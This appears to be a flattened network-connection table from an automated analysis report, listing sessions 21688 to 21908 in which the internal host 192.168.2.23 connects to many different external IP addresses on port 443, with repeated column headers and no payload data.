                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21688192.168.2.2332950174.83.143.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21689192.168.2.236007045.134.38.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21690192.168.2.2350358194.61.65.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21691192.168.2.235812017.220.115.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21692192.168.2.234194045.77.1.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21693192.168.2.2335118191.180.106.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21694192.168.2.2336648119.239.201.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21695192.168.2.2336388141.99.45.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21696192.168.2.2354750145.33.57.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21697192.168.2.2345122199.227.182.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21698192.168.2.2337972223.254.38.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21699192.168.2.2352488208.186.217.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21700192.168.2.2346466117.140.40.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21701192.168.2.235094871.113.67.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21702192.168.2.235206823.61.27.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21703192.168.2.2350990157.100.105.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21704192.168.2.2336954168.255.241.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21705192.168.2.234622697.34.79.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21706192.168.2.23558028.79.37.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21707192.168.2.2335842198.251.116.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21708192.168.2.2354440187.135.103.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21709192.168.2.2344080210.108.97.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21710192.168.2.234994012.231.32.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21711192.168.2.2357882194.130.180.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21712192.168.2.233870860.62.237.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21713192.168.2.2354496209.82.164.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21714192.168.2.2338892174.39.84.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21715192.168.2.2342732150.202.191.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21716192.168.2.2360332133.71.225.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21717192.168.2.2355174154.248.169.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21718192.168.2.2343198134.241.8.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21719192.168.2.2341014203.214.218.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21720192.168.2.2347798117.181.121.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21721192.168.2.233900271.77.114.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21722192.168.2.2359218180.159.117.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21723192.168.2.235980862.205.78.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21724192.168.2.235594089.145.20.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21725192.168.2.2346902126.126.46.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21726192.168.2.2343398111.10.217.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21727192.168.2.2348812194.196.2.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21728192.168.2.2353136161.231.25.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21729192.168.2.2335260176.14.207.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21730192.168.2.2357814168.28.142.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21731192.168.2.234246440.211.15.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21732192.168.2.2336946117.149.218.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21733192.168.2.2357578124.208.41.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21734192.168.2.234819878.124.53.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21735192.168.2.2352750121.2.61.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21736192.168.2.2335102206.163.100.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21737192.168.2.2333512153.162.127.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21738192.168.2.234083690.10.136.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21739192.168.2.2360818154.167.111.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21740192.168.2.2343166160.14.112.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21741192.168.2.2351204155.113.210.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21742192.168.2.2344768145.179.244.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21743192.168.2.2334050156.72.113.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21744192.168.2.234058618.85.29.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21745192.168.2.235988831.12.37.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21746192.168.2.2351648184.250.14.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21747192.168.2.235188817.67.34.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21748192.168.2.2344640194.202.78.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21749192.168.2.235756091.79.236.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21750192.168.2.235518441.86.172.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21751192.168.2.235851641.170.234.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21752192.168.2.234074651.9.41.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21753192.168.2.2333032146.92.24.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21754192.168.2.2338332206.207.133.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21755192.168.2.2359778158.235.9.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21756192.168.2.2353202177.227.113.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21757192.168.2.2358918177.65.82.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21758192.168.2.2359930112.240.86.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21759192.168.2.234347871.218.230.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21760192.168.2.234775867.184.60.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21761192.168.2.2346448152.201.190.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21762192.168.2.235355442.16.87.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21763192.168.2.23543688.239.8.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21764192.168.2.2342366154.221.67.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21765192.168.2.235017019.162.102.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21766192.168.2.235385457.254.117.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21767192.168.2.2347966117.170.95.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21768192.168.2.235004297.202.110.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21769192.168.2.23495642.215.73.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21770192.168.2.235363890.223.123.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21771192.168.2.233347645.96.104.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21772192.168.2.234281812.77.68.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21773192.168.2.2341112202.223.88.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21774192.168.2.2333722190.209.105.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21775192.168.2.2333472141.214.5.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21776192.168.2.2340006163.10.190.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21777192.168.2.23447869.117.99.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21778192.168.2.233896881.4.132.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21779192.168.2.2340302137.217.240.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21780192.168.2.2349368107.229.78.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21781192.168.2.2348440223.155.145.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21782192.168.2.23356809.77.242.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21783192.168.2.2360278104.193.139.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21784192.168.2.2341544162.229.214.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21785192.168.2.2341324190.184.10.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21786192.168.2.235204242.82.15.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21787192.168.2.2349634180.65.160.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21788192.168.2.23331705.247.162.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21789192.168.2.2344810211.183.32.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21790192.168.2.2358294183.92.187.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21791192.168.2.233923291.140.59.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21792192.168.2.2334632173.213.172.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21793192.168.2.234845079.177.49.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21794192.168.2.233564244.4.177.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21795192.168.2.233325014.17.169.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21796192.168.2.233542638.174.103.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21797192.168.2.2357708170.184.26.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21798192.168.2.2334464177.42.60.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21799192.168.2.234998244.175.24.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21800192.168.2.2343042205.15.54.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21801192.168.2.2346756139.75.11.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21802192.168.2.2355004172.78.148.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21803192.168.2.235238020.210.217.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21804192.168.2.235147496.79.166.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21805192.168.2.2354268155.97.81.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21806192.168.2.2334828151.148.217.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21807192.168.2.234112278.120.84.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21808192.168.2.2351898186.127.1.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21809192.168.2.2336238166.176.115.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21810192.168.2.234899482.165.73.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21811192.168.2.234918286.152.134.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21812192.168.2.233724218.85.82.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21813192.168.2.2352376184.91.137.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21814192.168.2.234844477.230.252.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21815192.168.2.2355070206.244.42.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21816192.168.2.233439647.105.116.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21817192.168.2.2342232107.144.170.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21818192.168.2.2357278165.130.25.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21819192.168.2.2360330206.35.49.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21820192.168.2.2359850136.157.6.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21821192.168.2.2353306147.109.188.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21822192.168.2.2352394153.96.46.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21823192.168.2.233961438.171.219.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21824192.168.2.2340894100.197.191.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21825192.168.2.2343882113.28.11.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21826192.168.2.233754219.13.189.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21827192.168.2.2345798222.195.232.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21828192.168.2.2355454188.134.46.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21829192.168.2.2338208205.39.152.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21830192.168.2.234111040.193.23.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21831192.168.2.233519639.179.224.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21832192.168.2.233929664.93.52.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21833192.168.2.2333090143.192.52.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21834192.168.2.2338488200.167.72.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21835192.168.2.2353728153.161.164.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21836192.168.2.233495458.80.228.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21837192.168.2.233959249.173.153.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21838192.168.2.233722877.248.219.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21839192.168.2.235604017.45.248.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21840192.168.2.2352118145.163.186.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21841192.168.2.2334046152.95.168.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21842192.168.2.2344822128.118.188.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21843192.168.2.2349278165.130.44.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21844192.168.2.2353902167.144.153.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21845192.168.2.2352914199.133.229.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21846192.168.2.233459288.0.224.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21847192.168.2.2340660158.52.15.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21848192.168.2.2357040159.40.70.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21849192.168.2.2345744169.73.134.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21850192.168.2.235088697.30.198.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21851192.168.2.2360882150.113.159.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21852192.168.2.235747074.32.247.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21853192.168.2.2340178102.113.61.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21854192.168.2.2349816168.76.68.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21855192.168.2.2345230136.68.30.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21856192.168.2.235513267.20.14.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21857192.168.2.235361013.247.93.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21858192.168.2.2347106132.89.80.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21859192.168.2.233817034.64.25.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21860192.168.2.2348294124.217.200.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21861192.168.2.235018469.188.233.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21862192.168.2.233647227.196.155.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21863192.168.2.2355820147.15.47.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21864192.168.2.2333136121.110.61.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21865192.168.2.2345764124.214.251.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21866192.168.2.2357454160.60.86.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21867192.168.2.2341680161.172.71.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21868192.168.2.233981449.141.171.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21869192.168.2.23606104.12.240.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21870192.168.2.2333362136.115.76.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21871192.168.2.2356322196.96.119.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21872192.168.2.234935092.155.83.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21873192.168.2.234451463.147.122.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21874192.168.2.2335434157.216.180.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21875192.168.2.234728876.211.240.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21876192.168.2.2356862216.233.125.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21877192.168.2.234337478.240.172.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21878192.168.2.235561285.223.45.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21879192.168.2.2344530159.36.45.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21880192.168.2.2355534153.232.47.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21881192.168.2.2349524218.112.143.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21882192.168.2.2346896174.62.145.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21883192.168.2.2335272213.14.167.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21884192.168.2.233552459.84.191.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21885192.168.2.2342700136.129.94.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21886192.168.2.2357030119.194.30.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21887192.168.2.236063493.246.1.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21888192.168.2.2339906160.6.164.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21889192.168.2.234344864.182.116.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21890192.168.2.2352992212.4.117.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21891192.168.2.235762097.79.36.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21892192.168.2.2334620184.64.188.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21893192.168.2.2354242122.126.131.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21894192.168.2.234633667.109.199.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21895192.168.2.2338296160.82.28.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21896192.168.2.2355374184.243.187.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21897192.168.2.2349948217.148.13.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21898192.168.2.2353084172.91.243.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21899192.168.2.233521051.191.209.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21900192.168.2.2336634209.225.170.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21901192.168.2.233894425.195.92.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21902192.168.2.235688857.188.51.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21903192.168.2.235593647.39.104.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21904192.168.2.2336828207.176.88.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21905192.168.2.2345384171.134.217.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21906192.168.2.2349764136.195.19.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21907192.168.2.2337554116.38.200.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21908192.168.2.2350544182.166.52.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
